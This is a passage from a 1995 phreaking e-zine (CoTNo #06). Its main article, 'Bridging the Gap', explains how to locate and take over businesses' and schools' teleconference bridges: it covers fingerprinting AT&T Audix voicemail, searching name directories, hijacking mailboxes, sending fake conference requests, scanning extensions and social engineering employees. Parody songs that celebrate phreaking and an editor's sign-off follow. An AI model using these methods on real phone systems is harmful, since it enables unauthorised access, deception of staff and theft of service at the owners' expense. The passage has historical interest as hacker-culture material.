  3311. I'm not sure about NorTel switches such as the SL-1, some people say yes,
  3312. while others say that only AT&T switches can be integrated with Audix. If
  3313. anyone knows, please let me know. Comments or suggestions are welcome.
  3314.  
  3315.  
  3316.                               -  Boba Fett
  3317.  
  3318. <EOF>
  3319. <05/23/95>
  3320.  
  3321.  
  3322. <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
  3323.  
  3324.  
  3325.  
  3326.  
  3327.                                       /\
  3328.                                       \/
  3329.                                Bridging the Gap
  3330.                         /\-------------------------/\
  3331.                         \/-------------------------\/
  3332.                                 Eddie Van Halen
  3333.                                       /\
  3334.                                       \/
  3335.  
  3336.  
  3337. INTRODUCTION
  3338. ------------
  3339. First of all I wrote this because for one thing I am SICK AND TIRED of sitting
  3340. on irc and seeing "k0nPhiNf0!?" pumped through my terminal every five seconds.
  3341. Then,once they get the k0nPh iNf0, I am forced to constantly hear from the
  3342. k0nPh people about how "DiZ k0nPh sUx!". People give me k0nPh info all the
  3343. time but I NEVER call into them.  Why?  Because these days,they DO suck.  It
  3344. seems the underground world have completely forgotten about what use to be
  3345. the best way to conference - BRIDGE's.
  3346.  
  3347.  
  3348. ABOUT BRIDGES
  3349. -------------
  3350. I'm sure everyone reading this knows what a bridge is.  Whether they know the
  3351. best way to get them is another thing.  I do, however, run across the
  3352. occasional irc'er that /msgs me with "whats a bridge?" when I bring up the
  3353. subject.
  3354.  
  3355. Bridges are just about the same as k0nPhz, except they are usually owned and
  3356. used by big businesses and schools on their own telephone equipment.  This
  3357. equipment is usually integrated into their voice mail and/or PBX computers
  3358. and allows the company or school to hold teleconferences without relying on
  3359. the national teleconference providers.
  3360.  
  3361. For those out there (if any?) that remember the 904-348 bridge,  it was a
  3362. System 75 PBX bridge used by a home school, where the students would call in
  3363. in the daytime and take tests and attend classes.  The way it was used was as
  3364. follows:
  3365.  
  3366.         You would dial 348-XX00 to 348-XX19.  That was ONE of the bridges.
  3367.         Anybody that connected to any number from 00 to 19 would be connected
  3368.         to the bridge.  If two people tried to connect to the same number, it
  3369.         would be busy. Thus, it had 20 lines.  A second bridge was reached at
  3370.         348-XX20 to 348-XX29. This was off the same system, but gave you a
  3371.         different bridge with 10 lines.  Yet another bridge could be found at
  3372.         348-XX30 to 348-XX69 off the same system.
  3373.  
  3374. You could call in during the daytime and mess with the teachers and kids or
  3375. whatever, but occasionally they would hang you up, or call you back or
  3376. something.  This one went down because it wasn't blocked from collect calls,
  3377. and the number got very widespread throughout the k0d3lyN3 and BBS world and
  3378. was constantly collect-called by lamers who didn't know how to phreak.  It is,
  3379. however, occasionally up for the students to use, but goes down as soon class
  3380. is over.
  3381.  
  3382. FINDING A BRIDGE.
  3383. -----------------
  3384. Finding a bridge use to be the easiest thing for me.  It used to be, like,
  3385. WHAT I DID.  I would put one up on my codeline, and spread it to the others,
  3386. and would call into QSD or Lutz or something about 30 minutes afterward
  3387. and get messages from people who I didn't even know saying "Hey,man,thanx
  3388. for puttin up that bridge!".  These days I don't even bother.  I don't WANT
  3389. to talk to half these idiots that are around today.
  3390.  
  3391. Anyway, lets say you want to find a bridge.  Go through the phonebook and look
  3392. up the all the big businesses.  Call the main numbers that you find after
  3393. hours and find out which ones have voice mail systems.  In this article, I
  3394. will focus on the Audix voicemail system made by AT&T so look for those.  To
  3395. tell if your target is using Audix, press *8 during the greet, and if it says
  3396. "Enter the four digit extension and pound sign." you have found one.  A
  3397. complete guide to hacking Audix voice mail can be found in CoTNo #1,
  3398. article #1.  Railroad companies like CSX and AT&T owned companies like
  3399. Transtech, or Card Services often have Audix systems with bridges.
  3400.  
  3401. Once you have the targeted Audix system,you need to start scanning for the
  3402. system extensions.  Hit *6 for the names directory and try entering
  3403. CONFERENCE, BRIDGE, or TELE.  You COULD possibly get the actual extension to
  3404. the bridge spit out right at you (as with CSX's system),or at least most
  3405. systems have that extension where you hear the person state their name
  3406. "Conference Planning".  If this is the case,you need to get a voice mail
  3407. box off the system and send a message to whatever extension Conference
  3408. Planning is saying something like "Yes, I need a conference set up for
  3409. such and such a date & such and such a time".  This will more than likely
  3410. work and Conference Planning will respond usually with either "No problem,
  3411. the teleconference bridge is at XXXX" or "All we need is the PIN
  3412. number you want."
  3413.  
  3414. However, a lot of systems do not have their *6 directory system configured
  3415. very good at all, so you might want to try scanning all the XX00 and XX99
  3416. and find out where all the computer-related extensions are located at.
  3417. Or you might want to social engineer it out of one of the people located
  3418. at an extension.  Try calling from within your box and acting like you work
  3419. there.
  3420.  
  3421. Once you have found what you think is the bridge,you need to test it out
  3422. with a friend.  If he calls into the same extension and gets a busy signal,
  3423. you may want tell him to try the next extension up.  If the bridge is
  3424. multi-lined, have him figure out how many lines the bridge has and make
  3425. sure the lines are all going to the same bridge and not 3 different
  3426. bridges or something.  Note that if you are scanning on a Railroad
  3427. companies system, you will sometimes come to an extension you might think
  3428. is a bridge and end up to be dispatchers.  So once you sign on to what you
  3429. believe is the bridge,hit a few dtmf tones and make sure you don't hear
  3430. someone say "You done hittin funny buttons!!!" or "dispatcher,mike."
  3431.  
  3432. SECURITY ON A BRIDGE.
  3433. ---------------------
  3434. Security on a bridge is a lot different than on an alliance or on a k0nPh.
  3435. You usually don't have to worry about it getting cancelled and the bridge
  3436. usually will not ever go down if you don't third-party or collect call to
  3437. it.  You are not dealing with the phone company here, you are dealing
  3438. with whatever business owns it, and if they detect a lot of activity on
  3439. the extension, they will usually either warn you to leave by recording the
  3440. conversations and playing them back to you, or just change the extension.
  3441. DO expect to be dealing with the business communication security person,
  3442. though, at one time or another.  They will usually talk to you and explain to
  3443. you why they need you to leave, and most of the time I found out, it wasn't
  3444. because of the people using their bridge, it was because of the collect-
  3445. calling, third party billing or the fact that people were using it via the
  3446. 800 number and the company was having to pick up the tab.  I don't recommend
  3447. finding a bridge and giving it to the entire world because when you are
  3448. not on, you don't know what goes on in the conversation, and if the company
  3449. does finally decide to get it investigated, the investigators seem to go
  3450. after the same thing every time: the source that gave out the bridge in
  3451. the first place.
  3452.  
  3453. CONCLUSION
  3454. ----------
  3455. Hopefully you have learned something from all this.  With a little time and
  3456. patience, you can set up a bridge that will last for weeks, maybe months.
  3457. And besides, hacking out a phone system will teach you a lot more than
  3458. than setting up a k0nPh off your neighbor's phone terminal.  So next time
  3459. you see someone flash "k0nPhiNf0!?", tell them to get off there ass and
  3460. try hacking one out for a change.
  3461.  
  3462.  
  3463. <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
  3464.  
  3465.  
  3466.  
  3467.  
  3468.                            Elite Music Part V
  3469.                            - Disk Jockey/WR -
  3470.  
  3471.  
  3472. Please note the /WR. Until now I have not been in textfiles at large, only
  3473. a few given to good friends. There have been other `DJ's out there; as many
  3474. as six by my count, so far. So even that my group has had but one member
  3475. for over four years, I keep the tag to distinguish myself.
  3476.  
  3477. Well, while on a (pretty lame, I must admit) conference with a barrage of
  3478. lame people, sending streams of DTMF tones, long belches, humming, and
  3479. music down the line, I got an idea. At one point the B-52's `Roam' was
  3480. played in the background during a half-intelligent discussion of cellular
  3481. telecommunications. These lyrics almost came to me almost immediately, and
  3482. these are the results. I intend to record this song for real in a few
  3483. months or so; I do have the instrumental of the real song and it would be
  3484. somewhat fun to do. Maybe a .AU will be out there on the Web, sometime...
  3485. and by that time these lame people might grow up. (But, I can't ask for
  3486. everything.)
  3487.  
  3488.   "Phone Roam"
  3489.  
  3490.   Roam cyberspace, switching through every carrier
  3491.   Oh girl won't you lend me one of those codes
  3492.   Take it trunk to trunk, hopping through the satellites
  3493.   Around the world, the call flags switchboard lights
  3494.  
  3495.   Roam if you want to, roam around the world
  3496.   Roam if you want to, without codes, without cards
  3497.   Roam if you want to, roam around the world
  3498.   Roam if you want to, without anything but an ESN
  3499.  
  3500.   Hit conferences where you'll lose your mind
  3501.   Toners and lamers, leave them all behind
  3502.   Take it trunk to trunk, hopping through the satellites
  3503.   Around the world, the call flags switchboard lights
  3504.  
  3505.   Roam if you want to, roam around the world
  3506.   Roam if you want to, without codes, without cards
  3507.   Roam if you want to, roam around the world
  3508.   Roam if you want to, without anything but an ESN
  3509.  
  3510.   Go ahead and roam, go ahead and roam
  3511.  
  3512.   Scan all you can while the Feds trace you
  3513.   Hack up PBXs till your hands get tired
  3514.   Take it trunk to trunk, hopping through the satellites
  3515.   Around the world, the call flags switchboard lights
  3516.  
  3517.   Roam if you want to, roam around the world
  3518.   Roam if you want to, without codes, without cards
  3519.   Roam if you want to, roam around the world
  3520.   Roam if you want to, without anything but an ESN
  3521.  
  3522.   Take it trunk to trunk, hopping through the satellites
  3523.   Take it trunk to trunk, hopping through the satellites
  3524.   Take it trunk to trunk, hopping through the satellites
  3525.   Take it trunk to trunk, hopping through the satellites
  3526.   Take it trunk to trunk, hopping through the satellites
  3527.   Take it trunk to trunk, hopping through the satellites
  3528.   Go ahead and roam, go ahead and roam
  3529.  
  3530.  
  3531. <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
  3532.  
  3533. End of CoTNo #06
  3534.  
  3535. I know you expect some snappy ending as usual to another successful issue
  3536. of Communications of The New Order, but considering the grimness of much
  3537. of this issue I don't think it would be appropriate.  Despite all of the
  3538. bad news that was presented in this issue, I hope that everyone will
  3539. "keep the faith", as it were.  Explore, learn, educate.  But don't do
  3540. anything stupid.  The powers that be are becoming increasingly intent
  3541. upon stopping those who are labeled as "hackers".  And everyday, there
  3542. are more of us for them to stop.  Everyday, we are being introduced to
  3543. new technologies that few people understand, and few people want to
  3544. understand.  Our desire to understand can be achieved, but we must be
  3545. careful.
  3546.  
  3547. Even though you just read this issue's Elite Music, I thought I would
  3548. finish off with another song that has special significance to me.  This
  3549. showed up in my e-mail the other day and it really made me think.  I
  3550. hope it is as meaningful to you as it was for me...
  3551.  
  3552.  
  3553. TNO MAN
  3554. -------
  3555. To the Tune of Desperado, by The Eagles
  3556.  
  3557.  
  3558. TNO man, why don't you come to your senses?
  3559. You been out jumping' fences into those Bell yards.
  3560. Oh you're a smart one, I know that you got your reasons,
  3561. these things that are pleasin' can hurt you somehow.
  3562.  
  3563.    Don't you hack on those old .mil sites,
  3564.    they'll catch you if you're lazy,
  3565.    you know diverting twice is always your best bet.
  3566.    Now it seems to me some eleet things
  3567.    have been shown upon your screen
  3568.    but you only want the ones that you can't hack.
  3569.  
  3570. TNO man, oh you ain't gettin' no younger,
  3571. your hunger for knowledge, it's drivin' you on.
  3572. And hacking, oh hacking, well that's just some people talkin',
  3573. your prison is waitin' at the end of the line.
  3574.  
  3575.    Don't your power get old on the Internet?
  3576.    The account won't die and the root won't mind,
  3577.    it's hard to tell the night time from the day.
  3578.    You're losin' all your highs and lows,
  3579.    ain't it funny how the feelin' goes away?
  3580.  
  3581. TNO man, why don't you come to your senses?
  3582. Come down from your firewalls, open the gateway.
  3583. It may be laming' but there's a job waiting for you.
  3584. You better let somebody hire you LET SOMEBODY HIRE YOU
  3585. you better let somebody hire you before it's too late.
  3586.  
  3587.        - Don Henley, Glenn Frey and the Voyager
  3588.  
  3589.